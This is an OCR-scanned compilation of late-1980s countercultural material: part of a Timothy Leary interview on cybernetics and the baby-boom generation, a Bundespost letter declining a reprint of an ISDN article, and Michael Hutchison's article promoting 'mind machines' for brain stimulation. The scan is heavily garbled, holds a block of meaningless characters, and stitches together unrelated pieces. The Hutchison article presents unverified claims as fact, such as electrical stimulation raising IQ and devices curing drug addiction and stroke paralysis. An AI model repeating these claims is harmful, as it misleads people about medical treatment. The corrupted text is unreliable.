So tlicrc arc going to bc cnor¬ 
mous free markets operacing 
according to die laws of supply 
and detnand - the basic form of democracy. 

WAo is mo!t ihrcalercd hy this idca? 

The nationalists and the religious people- Their 
power will be greatly diminished. 

And what ntll happen m thc fsoliheal arena? 

Polirics are going to change in die nen two to six 
jears, when thc baby-boom gencrarion comes of age. 

The baby boomers, bom 1946 to 1964, are now be- 
twecn ehe ages of forry-one and twenry-three. The 
1988 elcaion is the first in which every baby boomer' 
will bc over twenty-one The older ones are going to be 
nmning for office. That means in 1988, and certmnly 
in 1992, thc baby boomets, the Summer of Love kids, 
v.tI1 takc over. This generanon is 76 million strong. 

They’U bc in thc position of the shark in the swimming 
poo( thc polar bear in the small igloo. They can do 
whatever they fiickin’ want, 

Yet young people today seem morc consertatne thart ever. 

1 don’t think thc old terms like liherJ or conserratiK 
make much sense. They are individualists - skepncal, 
even cynicak about partisan polides. They’ve secn their 
ideals dashed with Vietnam, Watergate, Iranscam. 

These veterans of the Sixties are tough cooldes. 

But hem lang will it takc to get this techrwlogy mto the 
hartds of more people? 

Good poinc. I can only repeat that the personaliza- 


tion and popularization of high technology is the key. 
Popularization means cybcrnetic appliances in the 
hands of thc people. It is not just the personal Com¬ 
puter. It’s any electronic technology that allows you 
to change your screcn. With the new tape-editing 
appliances, you can become die director and produc- 
er of what you and your Family see. You can Com¬ 
bine educational programs with entertainment, cre- 
ate coUages with your own X-rated home movics and 
Bits you taped off CNN news. 

Yo w won’t be dependent on oulside programmers for all 
our entertammeni and informaheau 

Exactly. Don’t forget these media programmers 
want absolute control over our minds. When it s on my 
screen, I’ll dccide how it plays. 
■'iHi M mi.MiiBMi' i .Mui « "fljg ßjst tune 1 gor tumed on to 
the new cyber-pilor idea was in a 

r Video arcade. 1 watched my 

grandchildren moving rockets 
around on thc screens. Well, if 
you can do that with blips, you 
' can do it wiib ideas. 

People like Jerry FaUell and Ed 
h thc bcdt- Meese probabty woiddn’t be loo hap¬ 

py with your cyber-pilot ceneepL Are 
• you coneemed about thc regressise 

encraiwn represemed by Falwell and the 

Meese commisrion? 

T/. ßut They must be scotned and 

ridtculed. Still, when you think 
, / • about it, the Meese Commission 

a raui doesn’t really hurt self-directed 

Amcricans very mucK It stirs up 
up with .a lot of excitemeni. If 7-E!even 

won’t seil me Playboy, I’U just go 
ctOüo’' ^ another störe down the block. 

3 ' The poverty thing is what huns: 

people in the undcrclass deprived 
of information, discouraged from 
leaming cyberaeric skilk 

■ “ How do you propose we eorrtbal 

My Company, Futique — that’s 
che opposite of arttique — has joined up with Activision 
CO produce Software programs that are so inexpensive 
and attractive that ghetto kids can cjuickly pick up thc 
new language of screens and icons. More and more of 
che cybemede equipment will become available. It will 
filter into all homes eventually,just like the celevision. 

You speak Io many College audiences. What do you find 
out there? 

YHIt are dealing widi the best-educated gencration in 
hiscory. They are a hundred dmes bettet educated than 
their grandparencs, and ten rimes more sophisricated. 
There has never been such an open-minded group. 
The problem is that no one is giving them anydiing ftesh. 
Thcy’vc got a brain dressed up with nowhere to go. 

What da they expecl when they cometo see Tim Leary? 

The average College Student doesn’t know who I 
am. They weren’c even bom in tele ttamour. But woid 
gets aioiid. The rumor is that Vm »meone vaguely 

counterculture and highly controversiaL 
Wbal are you nying Io comrruaucale to them. 

This is the golden age of inteffigence. Instead of 
E = mc^ it’s I = mc^, where i is informanon. Accord- 
to tte formula, the aim is to acuvate your mind, 
^aken new ideas, improve your commun.cat.on 
sldlls. Pilot your life. Smarten up. 

And are the College kids resportdmg? 


I sense that a lot of College Idds envy the Sixties. 
They feel they have missed something. Today there’s 
not the exdtement and the feeling of change, dhe feel- 
iitg of engagement, that existed eben- So they cend to 
respond with enthusiasm to common-sense proposals 
for personal change. 

ll's ironie that the Sixties are yiewed so fcmdly when matty 
emergedfiom that period eompletely dsstUusioned. 

It depends on your viewpoint The so-called Sixties 
actually started in 1967, when the oldest baby boomer 
became twency-one. The Summer of Love was a com- 
ing-of-agc paity. It was triggered symbolically by die 
Beatles’ 5gt. Pepper album, which changed rock 8i roll 
into a new and powerftJ cultural form. There had been 
prepararions for it in jazz, m the beatniks, in Elvis Pres¬ 
ley, in the rhythm äC blues stufif, people like Ray 
Charles. And che early elitist drug stuff, Ken Kesey 
and our group at Harvard. But che signal wem glob¬ 
al with Sgt. Pepper. Every year afier 1967 produced 
another public eruption: the 1968 Chicago riots; 
Woodstock in 1969; Kent State in 1970. I thiidt the 
Sixties peaked in 1976 when we clected a hippie- 
dippy, Howdy Doody guy named Jinuny Carter as 
President. Gartet was quoetng Bob Dylan and talking 
about peace and love and civil rights and human 
rights. How Strange that seems today! 

The Spirit of the Summer of Love in America 
ended with a thud in 1980 when we eleaed Nancy 
Reagan as Commander in chief. But it rippled out 
globaJly. It surfaces whenever young people gec rid 
of the old World War II generals. Spain after Fran¬ 
co started iB summet of freedom. Portugal. Braail 
when the colonels got the boot. Argentina. The 
Philippines. What’s happening in South Korea right 
now looks familiär, doesn’t it? College kids and civil- 
ians in shirt sleeves standing up to the helmeted na¬ 
tional guard? Shades of Kent State. And now, exact¬ 
ly twenty years later, the Summer of Love b hitting 
Russia. Glasnost! Openness! Punk-rock clubs in 
Moscow! Gorby singing "Give Peace a Chance”! 
Mrs. Gorby quocing Lennon - John, not Vladimir 
Ilyich - to Yoko Ono! 

Irn'l the Reagan admirustrabon out of Step with all this? 

]c doesn’t matter. It cannot stop the evolutionary wav^ 
When it is time fcir the human spexies to activare their 
new brain efteuics, it’s gonna hafpea Nothing is going to 
stop ir! There is no way you can pass laws against die re- 
lendess increase in human intelligence. The evolunon of 
precise technology is so seductive. There’s no way you 
can stop individuals ftom exploring their brains and using 
the new cybemetic-knowledge appliances. 

ln the meantme? 

TTie old game goes on. It is the genetic duty of the 
power holders to in every way discourage change in the 
gene pooL This means that those of us who are wired 
to change have to be really smart and really tough. If 
we can’t prevail over turkeys like Meese and Falwell 
dien fuck iq we don’t deserve to get into die future' 
If we can’t outmaneuver vaeuous four-letter robots 
like Bush and Bork and Kemp and Dole, dien we 
bettet go back to school to smarten up. We are 
dealing with moral-mental pygmies herc. We can 
navigate around OUie Nordi’s 600-ship navy [rmifej 
hroadly]- They don’t have a chance. 


t N T E R V I E 


DAVID SHEFF 

aus dem “Rolling Stone" 






UNTERRICHTSBLÄTTER 

DER DEUTSCHEN BUNDESPOST 

AUSGABE B fernmeldewesen 

SCHRIFTLEITUNG 

Schriftleitung der Unterrichtsblätter der D8P, Fernmeldewesen 
_ Postfac h 555, 2000 Hamburg 36 

Herrn 

Werner Pieper 
Alte Schmiede 

69^-1 Löhrbach 


Unterrichtsblätter Jg. 39/1986, Nr. 9, S. 371-391 

Fernmeldewesen ISDN 1-21 

ISDN — Diensteintegrierendes digitales 
Fernmeldenetz 

Eine Einführung in das ISDN 

Oipl.-lng. Karl Heini Rosenbrock. PDir. BPW Bonn 

Ausgehend von den heutigen Fernmeldediensten, welche die DBP in verschiede¬ 
nen Fernmelderetzen anbietet, werden zunächst die wesentlichen technischen 
Merkmale des ISDN vorgestellt, die Entwicklungsschritte zum ISDN und insbe¬ 
sondere die Teilnehmeranschlußleitung im ISDN. Anschließend werden die im 
ISDN möglichen Dienste und Dienstmerkmale behandelt. Danach wird auf die 
Bedeutung des ISDN für den Anwender. Hersteller und Netzbetreiber eingegan¬ 
gen. Die Pläne der DBP beim Einführen des ISDN sowie die mögliche ISDN- 
Weilerertwicklung schließen den Beitrag ab. 

(B 1295.D9.86 G) 


Ihr Zeichen, Ihre Nachricht vom 

18 . 09.88 


Betreff 


Unser Zeichen, unsere Nachricht vom 

35 B-60 W 1776-1/4 


& (0 40) 

3 57- 52 59 

oder 27 78 


Hamburg 

25 . 05.88 


Ihr Nachdruckersuchen 


Sehr geehrter Herr Pieper! 


Von dem von Ihnen beabsichtigten Nachdruck des in den Unterrichts¬ 
blättern Nr. 9/1986 erschienenen Beitrags 

"ISDN - Diensteintegrierendes digitales Pernmeldenetz" 

bitten wir abzusehen. 


Mit /freundlichen GrüQen 





Grimm 


5 

Q 


2 

D 


Cf ’S 

U v> 


01 -ö 


S 2 S 
Q D Q 


o o o 

cj CO 04 


5 2 
Q O 


, ü) N 


(Q 


,-5 

Ol <1> 


CI 

o 

0 

X 

o 

X ^ 
« ^ 

:3 S 

0) X) 


_fC £ 

DO D LU 


O) 

ro 
C r 

0) 0) 
©> 
■« </, 


M CO 
b *0 

C m 

§2 


ö s, 

■= c 

CI 3 

E ^ 

I« 2 

§ O 

(A 

* C 

.2 X 

c o 

(Q 0 

0 ) XL 
1 . 

o ü 

’di 


2 “P <5 i> 

O Q, Xt 
O 1- u - 

q 

oSl 

'^-“1 
0) E I. 


V 

z 

3 


! lU 


X ' 

0 ' 

(f) 0) 
X c 

< LU 


o 
$ 
4) 
tJ 
O 

O 


0) V) X 
JO <13 O 
xj w 

■D </) ■' 


X TJ 
o c 

:«} <V 
C <fl 

E 01 

d) O) 

(/) 3 O 
0> M C 

N P <rt 

.£ ‘c ’S 
LU $ S 

<n i- o *- 
3 .7 3 


iS o ^ 


:i!§ O 
»-En. 

S o c3 

:ta b. f,, 

5.P 

OT g n 

Isf. 

“ir 

C (D d) 
3 jc g 

" « E 

X o £ : 

w 5 E CC 


<002 

c c O 

a» o c 

I O T3 

c Ö ^ 

<03 
<0 > = 
03-7: 


3 C 

X s> 

X O) 

< 2L 

J ^ 03 
“ c ^ 

® E ? 


X 3 X 
OT O) (Q 



TAe human louch. ln some instances, people can be more obliging than machines 



New Sdentist 23 June 1988 VJ 3 Z 



















Dieser Beitrag ist aus dem “Magical Blend Magazine” nachgedruckt. 
Wir bedanken uns für die entsprechende Erlaubnis und möchten dar¬ 
auf Hinweisen, daß man Probeexemplare des Magazins für 6 Dollar 
oder ein JahresAbo für 20 Dollar erhält. Zahlbar in US Dollar, 
US Money Order oder per Scheck (der auf eine amerikanische Bank 
bezogen sein muß!). - Magical Blend Magazine, P. O. Box 11303, 
San Francisco, Ca 94101, USA 



By 

Michael 

Hutchison 



electronic headpiece, flip a switch, and sink into a 
slate of deep relaxation. When you remove the 
headgear a half hour later you are more intelligent; 
your mcmory has increascd dramatically; your brain 
cells have forged new and richer interconnections; 
your thinking is more lucid and Creative; your brain 
itself, like a muscle that has just been pumping iron, 
has become larger, more po werful. Sounds like Sci¬ 
ence fiction, bul in fad l've spent Ihc last fouryears 
investigaling and experimenting with more than a 
dozen devices that show evidcnce of having such 
brain-boosting effects. 

My interesi in how modern technology could be 
used to Supercharge the brain was sparked by an 
experience I had over a decade back. 1 was living 
alone in a small log lean-to on a wildemess moun- 
tainside, and would often go for wccks wilhout 
speaking to another human. In the Winter, sur- 
rounded by vast fie.'ds of white snow and sky, I began 
to experience new things; exotic visions in my fire, 
long conversations wilh a voice inside my head. 


vivid memories, a flood of Creative ideas. When I did 
suddenly encounter a patch of color—the red blood of a 
freshly killed deer, the glittering eye of a weasel—it 
seemed electrifying, magically intense. It seemed as if 
my brain had shifted into some hitherto unsuspected 
higher gear. 

Al the same time 1 was reading neuroscientist John 
Lilly’s book Center of theCyclone, adescription of his 
first experiments in the mind altering environmentof a 
flotation tank. It stnick me that the mental States I was 
experiencing on the mountain were very similar to 
Lilly’s—except while mine were a result of many 
months of Isolation, Lilly's had happened within min- 
utes. It was like hiking thousands of miles to find that 
sorneone eise had arrived at the same destination in a 
few hours by Jet: the float tank seemed to be an ac- 
ceierator, a technological shortcut to heightened 
awarencss. Hey, said the voice in my head, We' ve got to 
check out thisßoating thing as soon as possible. 

When I tried it, floating seemed to catapult me into 
States of heightened awareness time after time. In- 
trigued, I began interviewing neuroscientists and pored 
over scientific Journals, attempting to discover what 
effects floating had on brain funclioning. My research 
led to the writing ofTheBookofFloating: Exploringthe 
Private Sea (Morrow, 1985). 

But in my talks with the scientists I discovered that 
the float tank was only onc cxample of a variety of new 
devices. I found there was a wholc network of neuro- 
psychologists, bioelectricians, engineers and inventors, 
keenly aware of the latest discoveries in neuroscience 
and actively engaged in devising, testing, and putting to 
use a variety of “mind-machines” that they claimed had 
a Wide ränge of brain-stimulating, mind-enhancina 
effects. 

Studies of some of these machines indicated that 





users showed dramatic improvements in IQ, memory, concentration, 
reaction time, sensoiy acuity, creativity and more. Often the devices 
produced peak experiences, euphoria, or “Eureka events.” One brain 
reseaicher called the use of such devices “the most significant 
development in leaming since the invention of writing." This, I decided, 
was something worth looking into. So for several years, in addition to 
investigating all the available research data on the devices, I spent 
hundreds of hours trying each of them out myself. I describe these 
SKploTiilionsinMegabrain: NewTools ondTechniquesfor DrainGrowth 
and Mind Expansion (Morrow 1986). 

But, you may wonder, how can mere mechanical devices alter such 
things as intelligence, Creative skills or the physical brain? These things 
are “given” to each of us, like our faces, aren't Ihey? Well, Ihat’s what 
scientists had long believed. Now, however, a series of extraordinary 
neuroscientific disco veries have re volutionized our view of how the brain 
Works. 

BRAIN EXPANSION THROUGH STIMULATION 

The major discovery has been that the human brain has the potential 
for immensely greater growth and transformation than anyone had 
imagined. This new understanding of the brain’s remarkable p/osricüy 
bcgan to emerge from a series of studies at UC Berkeley in which groups 
of rats were raised in different environments; some were kept isolated in 
"impoverished environments,” and some were placed in “enriched 
environments"—large cages with Swings, bridges, ladders, toys, 
frequently changing Stimuli, and a variety of challenges. As expected, 
when tested for intelligence, the “enriched” rats scored much higher than 
the others. However, the researchers were astonished to discover that the 
brains of the enriched rats actually grew larger and heavier. Analysis 
showed that this brain growth was caused by a growth of individual 
neurons, and was accompanied by an enormous increase in the richness 
and density of Connections between neurons. 

These lesults were so extraordinary that the researchers themsclves 
found them hard to believe, but studies by other scientists throughout the 
World quickly verified the findings and went beyond them; they found 
that such brain changes in response to Stimulation could take place 
virtually instantaneously, and not just in laboratory animals, but in 
human beings. Thcre is no longer any doubt: when presented with new, 
challcnging experiences or stimulations, the brain alters, grows. As 
neurobiolgist Gary Lynch of UC Irvine puts it, when the brain rcceives 
ceitain types of stimulations, “just bip!—literally that long, the nerve 
cireuits change and don’tgo back.” 

The implications of these findings are breathtaking. Since the brain 
grows in response to Stimulation, then ii should be possible to create 
instruments that deliver optimal types and amounts of Stimulation 
directly to the brain, feeding concentrated bursts of experience to our 
neurons and, in a hothouse effect, triggering brain growth and neural 
enrichment. Such mind machines could rapidly create the sort of 
intensified, high-efficiency mental States produced more slowly by such 
tradilional mind-expanding techniques as meditaüon, chanting, and 
yoga: peak experience virtually on demand. 

THE EVOLUTIONARY BRAIN 


ing energy. 

But there’s a further, and perhaps more important explanation. We 
know the evolutionary process continues as the human race faces serious 
threats to its survival. Perhaps today the humans “fittest” to survive are 
not the strengest or best hunters, but those most imaginative, adaptive, 
and capable of devcloping strategies to insure the survisial of the species. 
The unprccedentcd problems the world faces today demand mental 
Solutions, new ideas. Human survival may depend on our ability to 
increase our mental powers and develop new strategies for overcoming 
our present crises. Evolution involves developing new mental powers: 
we have rcached “childhood’s end.” So, effective mind machines, 
devices that enhance mental functioning and stimulate richer neural 
interconnections, might be seen as evolutionary tools. 

It is possible, then, that the growing drive toward mental enrichment, 
brain Stimulation, and the exploration of our mind's potentials (what 
writer Robert Anton Wilson calls the “Intelligence Intensification Ex¬ 
plosion”) represents theupsurge of some survival instinct from the depths 
of our collective human unconscious, and may well be pari of a poten- 
tially beneficial, history-determining process—one which could widen 
our knowledge and, conceivably, help determine the future of the race. 
Then there’s this, too: the machines are fun and fcel good! They offer 
large numbers of people the opportunity to explore allered States of 
consciousness safely, legally, and withou t any of the potential side effects 
of mind altering Chemicals. 

ln his seminal book, Prometheus Rising, Robert Anton Wilson, 
discussing the “robotcycles” humans seem trapped intorepeating, Claims 
that, "When the accumulated facts, tools, techniques and gadgets of 
neuro-science—the Science of brain change and brain Uber ation—reach 
a certain critical mass, we will all be able tofree ourselves from these 
robotcycles.” He asserts that we will reach this critical mass of crossover 
point in “less than ten years.” Those words were wrilten over six years 
ago. 1 believe that we are leaching that critical mass now. 

Here are some of the “brain liberalion” tools that are now available. 

The SYNCHRO ENERGIZER is a 
console about the size of a small briefease 
covered with dials, to which are altachcd Stereo 
headphones and goggles thatencircle each eye 
with tiny light bulbs. When the machine is 
turned on the uscr hears rhythmic sound 
pattems that pulse in synchronization with a 
stroboscopic flickering of lights. EEG studies show that brainwave 
aclivity falls into rhylhm with (or becomes "enlraincd” to) the device, 
fascillitaling the desired brain wave frcqucncy al the turn of a dial. 

What’s more, the synergistic effect of the sound and light produces a 
kalcidoscopic stream of brilliant pattems and images. Even though the 
lights are white, the visions that appear are vivid, spectacular, of bright 
primary colors. Often, the images bccomc realistic mind movies: 
emolionally charged and dreamlike scenes. Dr. Thomas Budzynski, who 
uses the device in his biofeedback clinic in Denver, has called it “a 
facililalor of unconscious retrieval.” The device is now the subject of 
research at over a dozen universities in such areas as education and 
accelcratcd leaming. gerontology, Sports performance, pain rcduclion, 
and substance abuse. 


Synchro 

Energizer: 

Pacemaker for 
the Brain 


As I experimented with devices with names like the Mind Mirror, 
Tranquilite, and Alphatronic I became increasingly impressed, not only 
with the sheer variety of imaginative tools people have devised in Iheir 
attempts to enhance mental powers, but by the facl that so many people 
have feit driven to create such devices, and Ihat so many others are so 
eagerto make use of them.The phenomenon seems tobe the cutting edge 
of some powerful but as yet little recognized cultural drive. 

The recurrent comparison of the machines with exercise and body- 
building provides one explanation. As our national Obsession with 
physical fitness grows, an obvious next step is a tum to mental fitness. 
What use is a youihful, powerful body with a deteriorating, 97 poimd 
weakling of a brain? Seen in this light, mind machines are siraply mental 
counterpartsof Nautilus machines: moving frompumping iron topump- 


Hemi Sync: 


I Hear A 
Synchrony 


Radio-TV executive Bob Monroe (best 
known for his book JourneysOut ofthe Body), 
Irying to induce States of high-level brain 
functioning, experimented with special sounds 
called “binaural beat frequencies.” He found 
that when these sounds, madeofeorabinations 
of two or more pure tones, were introduced into 
the brain. they caused the brainwave activity to fall into the same rhythm 
as the beat, like acrystalgobletresonating to apure tone. Selecting sound 
Signals of appropriale frequencies, Monroe could alter and entrain brain 
wave activity, causing both brain hemispheres to resonate at whatever 
frcqucncy he desired. 

This was a valuable and revolutionary discovery. Extensive research 


v‘. 



Mi: 





had alrcady provcn Ifiat when Ihc brain was incerlain exUaordinary States 
(such as in thc depths of mcditation, al momcnls of inlcnsc crealivity or 
al peak expericnccs), it produced a charactcristic pattem of brainwaves 
including large quantitics of slow brain waves (called theta waves), and 
shiflcd inlo a pattem in which both hcmisphcrcs functioned together (a 
state neurologists called '‘synchrony”). Monroe’s discovery made it 
possible to produce certain Sound pattems ihat would allow the uscr to 
produce bolh hcmisphcric synchrony and to “tune" the brainwaves to 
whalcvcr frequcncy was desired. 

Monroe patcnled this audio brain-synchronization melhod underthe 
name HKMI SYNC, and now makes it available on a variety of tape 
rccordings for homc use, or in the form of a Hcmi Sy nc Synthesizer, which 
can bc hooked up to a homc audio System. This Synthesizer is a powcrful 

deVicc: i tcan bc adjusted to play any of a variety of beat frequcncies (such 

as a combination of thcla and the ultra-slow dclta, to induce profound 
relaxation; or a combination of theta with the rapid beta, to produce a 
relaxed but alert state ideal for Icaming, rcading, etc.) and to play thcsc 
beat frequcncies at any sound level desired (you can set it several dccibels 
below thc level of the music you’rc playing. so that the Henri Sync Signals 
are never audible yet still have powerful mind-altering effects). 

Laboratory rcscarch into the uses of Hcmi Sync shows a variety of 
brain stimulating effects, and in fad thc devicc is now being used as a lool 
for increasing classroom attention and acceleraling leaming in a nuraber 
of public school Systems, at universitics, and in U.S. Army languagc 
schools. 


We have electric-powered brains: all our 
thoughts and perceptions consist of the 
interactions of complcx elcctromagnelic 
Systems and fields ihatconstantly sweep across 
the brain, triggering the release of neuro- 
chemicals. So it makes sense that shooting an 
electrica! current Ihrough Ihe brain should 
directly, at times radically, alter one’s mental state. 

One way of doing this has comc inlo wide use in the last two decades: 
Transcutaneous Electro Neural Stimulation, orTENS. TENS uniis are 
widely used to alleviale pain or overcome addictions sincc thc electrical 
current stimulates the nelease of the neurochemicals known as 
endorphins, thc body’s natural opiates. However, according to 
bioclcctricily expens, clcctrical currents can be dclivered in an infinite 
number of wave shapes, frequcncies, and intcnsiiies, each onecapableof 
affeciing different groups of ncurons and causing them to release 
different neurochemicals. Since scicntisls now bclicve that there are a 
neurochemicals mediating virlually every mental state, such as love, fear, 
couragc, scrcniiy and deep concentration, theorelically it is possible, if 
the device is “tuned” to the correct level, to slimulaie any mental state. 


Alpha-Stirn 


We Sing the 
Mind Electric 


ALPHA-STIIVI. One of the most effeclive TENS devices is one 
developcd by neurobiologistDr. Daniel Kirsch and called the ALPHA 
STIM This device operalcs al levels hundreds of times Icss powcrful, and 
at a much lower frequcncy, Ihan most TENS units-producing a current 
similar to the natural cunent produced by the body’s cclls, and thus abic 
10 stimulalc llie cells in a morc natural way. . . , ■ i 

Aside from thc thcrapcutic applications, thc device is of parlicular 
intcrest to thosc intcrcsled in enhanced mental functioning when itis use 
in its “iranscranial” mode; by aliaching the clectrodcs to your car o cs, 
you can send cutrent directly into the brain, rapidly producing a state of 
deep relaxation, heightened awareness, and a sense of well-bc.ng or 
euphoria. Research now suggests that by “luning” thc bram s elcctncal 
acliviiy and stimulating thc release of ncurotransmiltcrs associatcd wiih 
enhanced mental performance, such devices can be used lo boost leam- 

ine memory, and other mental processes. 

Perhaps the most stariling and convincing studics have recently been 
completed, and the extraordinary rcsults are only now being madc pub ic. 
Rtrhard M adden Ph.D., of the School of Eleclromcdical Sciences of the 
City University ofLos Angeles, working with Dr. Daniel Kirsch the dcan 
S that school (and also the inventor of the Alpha-St.m), conducted an 
- ex “nt in electrical Stimulation and leaming usmg a double-bhnd. 


placcbocontrol design. Subjects were randomly assigned to two groups; 
(1) an experimental group, who rcccivcd elcclroslimulalion while 
leaming and performing a Computer lask; and (2) a control group, who 
were also hooked up to thc elcclroslimulalion devices and rcccived thc 
samc ircaimcnl as the experimental group, but did not rcceive any 
electrical Stimulation. Statistical comparisons showed both groups were 
inilially equivalcnl in age, education and pretreatment performance. 

The experimental group rcccived 10 minutes of electrical Stimulation 
while leaming and performing thc Computer task; the control group 
Icamcd and performed thc task for the samc period of time, wiihoul 
Stimulation. The rcsults were clear: thc group rccciving electrical Stim¬ 
ulation Icamcd the task, and performed the task with more speed and 
accuracy than the control group. That is, the electrical Stimulation 
actually improved leaming abilitics, concentration, accuracy and speed! 

Another inlriguing fact came to light as Ihe results were analyzed. The 
experimenters cxpecled that both groups would improve on their per¬ 
formance with repeated practicc and greater familiarity with the task. It 
makes sense that the more you practice somclhing, the beiter you will 
perform that task. However, something unexpecicd happened wiih the 
control group. As Kirsch explaincd it to me, “The intcresting uncxpecled 
finding was that 30.8 pcrcenl of the control group actually did worse as 
ihey wem along. We cxpccicd them to do bcUcr with cach irial; ihey did 
worse, due lo faliguc, inaltcntion and boredom.” On thc other hand, the 
group recciving electrical Stimulation conlinued to improve and leam 
over repeated trials. Somchow electrical Stimulation allcviated boredom 
and fatiguc. 

Maddcn and Kirsch conclude: “Since the rcsults of this study dem- 
onslrale the cfficacy of TCES [Iranscranial elcclrosiimulation] in im- 
proving human leaming and performance, thc possible applications of 
this modaliiy seem virlually unlimiied. TCES scems well suiied to 
education and training environmenis. Most directly related to this study 
might be thc use of TCES by Colleges and busincss schools to teach typing 
and Word processing skills morc expeditiously. Normal or leaming 
disablcd childrcn mighl also be taughl morc cfficicnlly under the im- 
mcdiatcor residual effects ofTCES in classroom settings. 

“Morc removed from this study mighlbe thc use ofTCES in busincss 
and industrial environmenis lo stimulatc cxcculivc problem solving or 
improve workers’ concentration, accuracy and speed. Police officers, 
automobile drivers, air traffic Controllers, surgeons, pilols, athlcles and 
others sccking incrcascd alcrlncss, concentralion and performance may 
benefit from TCES.” 

As Kirsch lold me, "This study is extremely significant, bccause it 
proves that slimulalion of thc brain can induce positive changes. People 
are always scarching for ways to improve ihemsclves, and if iherc’s a safe 
and easy and pro^cti melhod, then it should be used, because ii’s a 
Catalyst. The brain is likc a musclc, thc morc you work it thc more you can 
Icam, and thc casicr it is to leam.” 


For over fiflccn years inventor Michael 
Hercules worked as an acrospacc engincer 
spccializing in bio-mcdical clcctrnnics and 
Vibration analysis on thc Landing Excursion 
Module for Ihe NASA moon shols. Hc also 
served asTcsl Cond uctor for the Titan 1 project 
“Düring this time,” hc told me, "I bccame 
intcrcsled in thc rcsearch revcaling the many benefits of mcditation (such 
as thc boosting of intclligencc, improved healing, and stress rcduciion) 
and dccidcd to construct a mcchanical aid to help medilators overcome 
difficullics in rcaching deep meditative States.” 

Kcying on the Russian Elcctro-Slccp Machine that had aroused great 
intcrest somc years ago, Hercules allcrcd and streamlincd il, and came up 
wiih whal is now known as thc Pulstar, a devicc hc Claims “subliminallv 
teaches control of brain-wave frequcncy by propagaiing an electronic 
Signal Ihrough thc brain.” The device is about thc size of a small book 
wiih an on-off switch, a knob to control thc inlcnsity of the Signal (which 
is in the 5 lo 20 microampere ränge—well below the limits set bv th 
FDA), a white noisc generator (according to Hercules this buffers the 


The Pulstar 


Mechanical 

Meditation 



electronic pulse wave and makes it more acceptable lo the brain), and a 
frcqucncy sclccior knob which allows you to choose any frequcncy from 
6 Hz (in the Theta ränge) up to 14 Hz (low Bcla). Fourelcctrodcs archcld 
against Ihc skull with a headband. 

The uscrselccis an approprialc frequency (the inventor’s researchhas 
led him torecommend cerlain frcquencies for specificgoalsor States: e.g. 
12 Hz for“ccntcring,”reiaxation and mental stabil ity; 10.5 Hzforhcaling 
of the body and extreme relaxation; 7.5 for inner awareness with a sharp 
sense of focus and attention, guided meditaiion and Creative thinking; and 
6.3 Hz for accclerated leaming and increased memory.) Then, when the 
Signal is turned on, the uscr fccls a mild pulsing. At this point, says 
Hercules, "the brain locks onto and falls into Step with the frcqucncy 
sclcctcd.” This entrainment, according to EEG analysis done by Her¬ 
cules, “lakes place throughout the entire cerebral cortex and puts both 
brain hemispheres into synchronization." 

Hercules notes that the device produces what we have called the 
BicycleTraining Whcels Effect: “As a teaching dcvice,its main purpose 
is to directly instruct the uscr how to duplicate the desired frequency at 
will. Once a particular frequency has been leamed, the machine is no 
longcrrcquircd." 

Whilc users report that the device is effective for a variety of uses, 
including accclerated leaming, stress reduction, creativity enhancement, 
meditaiion, athletic or fitness training, sleep reduction, and pain control, 
oneof the most inlriguing areas is thatof healing and cellular regenera- 
tion. Scveral medical and scientific rescarch organizalions are investi- 
gating the cffecls of Pulstar in these areas, and there are indications that 
at cerlain frcquencies the device stimul ates the relcase of growth hormone 
and speeds the healing and growth of cclls. 

Hercules offers himsclf as an example of the Pulstar’s powers in this 
arca.ln 1986 hesuffered a severestroke that, as arcsultof thedestruction 
of brain cells, totally paralyzed his Icftside. “I used the Pulslar, and went 
from bed to whcclchair lo walker to care lo almosl total recovery in five 
weeks.” When I talkcd with him about six months after the stroke, 
Hercules was preparing to go off to Mexico for scuba diving. Recovery 
from such extensive deslruction of neurons clearly involves substantial 
rewiring and other structural changes in the brain, establishing newroutes 
of neural communication. Hercules Claims, and there is some cvidcnce to 
bcar out his Claims, that the Pulstar is effective in stimulaling just such 
brain growth. 


One of the most highly respected figurcs in 
the field of elcctromagnctics is engincer/ 
physicisl Dr. Robert Beck. I recently asked 
Beck what was the most effective way to 
producc cnhanccd mental funclioning and 
allered slalcs of consciousness, and hequickly 
answered “non-linear orthogonal EM ficlds.” 
He cited sludies showing that propereleclrical Stimulation increased l.Q. 
by 20-30 points, 

Beck has invented a neuro-electrical Stimulator called The Brain 
Tuner that is arousing great inlerest. Unlike adjustable devices that 
deliverrelatively simple waveforms at frequencies selected by the user, 
the Brain Tuneris said to emil256 siraultaneous frequencies—what the 
distributor calls “all known beneficial frequencies for the natural 
Stimulation of the brain’s neurotransmitters.” (According to Dr. Beck, 
this is made possible by the device’s unique intcgralcd cireuits, 
containing some 50 transistors and 4 diodes, that produce "nested 
modulalions of short-duralion rectangular non-linear waves in pulsed 
bursts.Very short rise-timesinsureharmonic output at beneficial speclral 
‘Windows.”’)Thus, in acomplex inlermingling of frequencies, thedcvicc 
seems to be capable of stimulating the brain lo pour out an 
electrochemical cocklail (in fact one woman who was trying this dcvice 
for the first time tumed to me after a fcw minulcs, her face alight with 
sudden understanding, and said, “Oh, 1 .sec, il’s an clcctric martinü”) 
The device seems lo be a step beyond the “Black Box” of Dr. Margaret 
Cameron that gained attention scveral ycars ago when a variety of rock 
Stars such as Peter Townshend and Keilh Richard used it to ovcrcomc 
addictions to hcroin, alcohol, and other drugs. The Brain Tuner ilsclf has 


been used successfully lo treat addictions (and rclicvc withdrawal 
Symptoms) involving cocaine, herein, alcohol, and tobacco. Among the 
rcsults noted most commonly by users are stress reduction, raising of 
stress tolcrancc levcls, allcviation of depression and anxicly, normalizcd 
sleep pattems, rcduced sleep requirement, more REM sleep, more vivid 
and lucid dreams, improvement of both short term and long term memory, 
improved concentralion, and increased energy levcls. Bcck laughingly 
told me of a woman who had lost memory as a rcsult of ancslhcsiaduring 
surgery, and ten ycars later began using the Brain Tuner. Shc was 
astoni.shcd to find hcrsclf suddcnly remembering hundreds of phonc 
numbers of the people shc had worked with over a decadc bcforel 
The dcvice is quite simple to usc—two clcctrodcs arc applied to 
acupuncture points in the hollows just bcncath the earlobcs. The clcc¬ 
trodcs arc plugged into a consolc smallcr than a pack of cigarettes. A 
singie-knob tums the dcvice on and adjusls the inlcnsity of the slimu lation, 
which fecls likc a mild, plcasanl tingling. Düring the period of usc (about 
40 minutes) many people nole a mild cuphoria, and a Sensation of 
increased mental energy and clarity. Theseeffects can lingcr for hours and 
in some cases days. 

THE ALPH ATRONIC UI. Anoihcr brain 
Stimulation dcvice many users are finding 
effective is the Alphatronic 111 designed by 
elcctrical engincer Lowcll Pope. Unlike the 
Brain Tuner, this lililc box delivers a modified 
